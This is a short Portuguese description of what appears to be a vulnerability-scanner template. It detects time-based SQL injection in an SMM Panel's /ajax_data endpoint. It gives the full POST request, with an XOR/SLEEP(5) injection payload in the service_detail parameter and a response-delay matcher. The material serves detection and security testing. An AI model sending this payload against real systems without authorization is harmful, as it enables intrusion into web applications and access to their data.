
Modelo de detecção de injeção SQL baseada em tempo para SMM Panel visando o parâmetro service_detail via solicitações POST elaboradas para /ajax_data, usando atraso de resposta para confirmar a vulnerabilidade.
Detecção de SQL Injection baseada em tempo para SMM Panel
Este template detecta uma vulnerabilidade de SQL Injection baseada em tempo no parâmetro service_detail do SMM Panel através de requisições HTTP POST para /ajax_data. A exploração pode permitir que atacantes remotos acessem dados sensíveis ou escalem privilégios.
A ferramenta envia uma requisição POST personalizada:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Se o tempo de resposta for maior que 5 segundos, indica um endpoint vulnerável.
- Método: POST
- Caminho: {{BaseURL}}/ajax_data
- Cabeçalhos: Content-Type: application/x-www-form-urlencoded
- Corpo: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duração > 5 segundos
